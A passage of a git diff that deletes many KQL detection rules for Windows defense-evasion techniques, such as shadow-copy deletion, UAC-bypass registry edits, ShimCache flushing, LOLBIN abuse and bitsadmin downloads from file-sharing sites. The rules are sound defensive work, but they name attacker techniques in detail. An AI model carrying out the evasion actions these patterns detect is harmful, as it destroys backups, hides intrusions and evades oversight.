contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE") \ No newline at end of file diff --git a/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql b/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql deleted file mode 100644 index dc89c692..00000000 --- a/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: medium -// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" -// Tags: attack.execution, attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql b/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql deleted file mode 100644 index fd22f26f..00000000 --- a/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs - -// Tags: attack.defense_evasion, attack.t1564.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " +s" and (ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs") and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") and (ProcessCommandLine contains " %" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\Windows\\TEMP\\" and ProcessCommandLine contains ".exe"))) \ No newline at end of file diff --git a/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql b/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql deleted file mode 100644 index ef8ae60e..00000000 --- a/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) -// Date: 2019/10/22 -// Level: high -// Description: Shadow Copies deletion using operating systems utilities -// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1490 -DeviceProcessEvents -| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE")) \ No newline at end of file diff --git a/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql b/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql deleted file mode 100644 index 572e8c51..00000000 --- a/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/11/24 -// Level: high -// Description: Detects shell32.dll executing a DLL in a suspicious directory -// Tags: attack.defense_evasion, attack.execution, attack.t1218.011 -DeviceProcessEvents -| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql b/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql deleted file mode 100644 index 3d4deb59..00000000 --- a/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1546.001 -DeviceRegistryEvents -| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)"))) \ No newline at end of file diff --git a/Defense Evasion/ShimCache_Flush.kql b/Defense Evasion/ShimCache_Flush.kql deleted file mode 100644 index f8a6db43..00000000 --- a/Defense Evasion/ShimCache_Flush.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/02/01 -// Level: high -// Description: Detects actions that clear the local ShimCache and remove forensic evidence -// Tags: attack.defense_evasion, attack.t1112 -DeviceProcessEvents -| where ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "apphelp.dll") and (ProcessCommandLine contains "ShimFlushCache" or ProcessCommandLine contains "#250")) or ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "kernel32.dll") and (ProcessCommandLine contains "BaseFlushAppcompatCache" or ProcessCommandLine contains "#46")) \ No newline at end of file diff --git a/Defense Evasion/Sideloading_Link.EXE.kql b/Defense Evasion/Sideloading_Link.EXE.kql deleted file mode 100644 index 86e7b9e1..00000000 --- a/Defense Evasion/Sideloading_Link.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/22 -// Level: medium -// Description: Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "LINK /" and FolderPath endswith "\\link.exe") and (not((InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")))) \ No newline at end of file diff --git a/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql b/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql deleted file mode 100644 index e86795a7..00000000 --- a/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/07/16 -// Level: medium -// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications -// Tags: attack.defense_evasion -DeviceProcessEvents -| where FolderPath endswith "\\ntvdm.exe" or FolderPath endswith "\\csrstub.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspect_Svchost_Activity.kql b/Defense Evasion/Suspect_Svchost_Activity.kql deleted file mode 100644 index 0c14e8e3..00000000 --- a/Defense Evasion/Suspect_Svchost_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: David Burkett, @signalblur -// Date: 2019/12/28 -// Level: high -// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055 -DeviceProcessEvents -| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql b/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql deleted file mode 100644 index dc599be6..00000000 --- a/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/17 -// Level: high -// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "advpack" and ((ProcessCommandLine contains "#+" and ProcessCommandLine contains "12") or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql b/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql deleted file mode 100644 index 48c1c2d1..00000000 --- a/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards -// Date: 2022/12/24 -// Level: high -// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath endswith "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\" or ProcessCommandLine contains "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql b/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql deleted file mode 100644 index 1407fd7f..00000000 --- a/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/05 -// Level: high -// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications" and (RegistryKey contains "\\Users\\Public" or RegistryKey contains "\\AppData\\Local\\Temp" or RegistryKey contains "\\Desktop" or RegistryKey contains "\\PerfLogs" or RegistryKey contains "\\Windows\\Temp") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql b/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql deleted file mode 100644 index 55cd2a6a..00000000 --- a/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113 -// Date: 2022/06/21 -// Level: medium -// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains " -cab " or ProcessCommandLine contains " /cab ") and (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Calculator_Usage.kql b/Defense Evasion/Suspicious_Calculator_Usage.kql deleted file mode 100644 index 70fa9441..00000000 --- a/Defense Evasion/Suspicious_Calculator_Usage.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/02/09 -// Level: high -// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion. - -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where ProcessCommandLine contains "\\calc.exe " or (FolderPath endswith "\\calc.exe" and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Call_by_Ordinal.kql b/Defense Evasion/Suspicious_Call_by_Ordinal.kql deleted file mode 100644 index 951412c5..00000000 --- a/Defense Evasion/Suspicious_Call_by_Ordinal.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/10/22 -// Level: high -// Description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where ((ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains ".dll #" or ProcessCommandLine contains ".ocx #") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not(((ProcessCommandLine contains "EDGEHTML.dll" and ProcessCommandLine contains "#141") or ((ProcessCommandLine contains "\\FileTracker32.dll,#1" or ProcessCommandLine contains "\\FileTracker32.dll\",#1" or ProcessCommandLine contains "\\FileTracker64.dll,#1" or ProcessCommandLine contains "\\FileTracker64.dll\",#1") and (InitiatingProcessFolderPath contains "\\Msbuild\\Current\\Bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" or InitiatingProcessFolderPath contains "\\Tracker.exe"))))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql b/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql deleted file mode 100644 index d6006a54..00000000 --- a/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/16 -// Level: high -// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript -// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql b/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql deleted file mode 100644 index b25dfd18..00000000 --- a/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/10/14 -// Level: high -// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055, attack.t1036 -DeviceProcessEvents -| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql b/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql deleted file mode 100644 index 473e7753..00000000 --- a/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/14 -// Level: high -// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe". -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\notepad.exe") or (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Roaming\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\")) and InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql b/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql deleted file mode 100644 index 595debb6..00000000 --- a/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2019/10/14 -// Level: medium -// Description: Detects a code page switch in command line or batch scripts to a rare language -// Tags: attack.t1036, attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine endswith " 936" or ProcessCommandLine endswith " 1258") and FolderPath endswith "\\chcp.com" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql b/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql deleted file mode 100644 index 02f15c71..00000000 --- a/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2017/04/15 -// Level: high -// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\System32\\control.exe") and (not(ProcessCommandLine contains "Shell32.dll")) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql b/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql deleted file mode 100644 index e11f3a48..00000000 --- a/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/07/03 -// Level: medium -// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. -Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. - -// Tags: attack.defense_evasion, attack.t1036.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql b/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql deleted file mode 100644 index a0619d77..00000000 --- a/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/21 -// Level: high -// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\ -// Tags: attack.defense_evasion, attack.t1564 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\colorcpl.exe" and (not((FolderPath endswith ".icm" or FolderPath endswith ".gmmp" or FolderPath endswith ".cdmp" or FolderPath endswith ".camp"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Csi.exe_Usage.kql b/Defense Evasion/Suspicious_Csi.exe_Usage.kql deleted file mode 100644 index ea5c49ee..00000000 --- a/Defense Evasion/Suspicious_Csi.exe_Usage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Konstantin Grishchenko, oscd.community -// Date: 2020/10/17 -// Level: medium -// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' -// Tags: attack.execution, attack.t1072, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_CustomShellHost_Execution.kql b/Defense Evasion/Suspicious_CustomShellHost_Execution.kql deleted file mode 100644 index b82c76dd..00000000 --- a/Defense Evasion/Suspicious_CustomShellHost_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe' -// Tags: attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\CustomShellHost.exe" and (not(FolderPath =~ "C:\\Windows\\explorer.exe")) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql b/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql deleted file mode 100644 index 6a1909b6..00000000 --- a/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/15 -// Level: high -// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and (ProcessCommandLine contains "\\Appdata\\Local\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Tasks\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql b/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql deleted file mode 100644 index 69f6a7aa..00000000 --- a/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/11/26 -// Level: medium -// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file. -// Tags: attack.defense_evasion, attack.t1564.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Double_Extension_Files.kql b/Defense Evasion/Suspicious_Double_Extension_Files.kql deleted file mode 100644 index 0ef9f5c1..00000000 --- a/Defense Evasion/Suspicious_Double_Extension_Files.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2022/06/19 -// Level: high -// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default. -// Tags: attack.defense_evasion, attack.t1036.007 -DeviceFileEvents -| where (FolderPath endswith ".rar.exe" or FolderPath endswith ".zip.exe") or ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and (FolderPath endswith ".exe" or FolderPath endswith ".iso" or FolderPath endswith ".rar" or FolderPath endswith ".zip")) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql b/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql deleted file mode 100644 index 194705f0..00000000 --- a/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql b/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql deleted file mode 100644 index b4aa432b..00000000 --- a/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file from a suspicious domain -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine 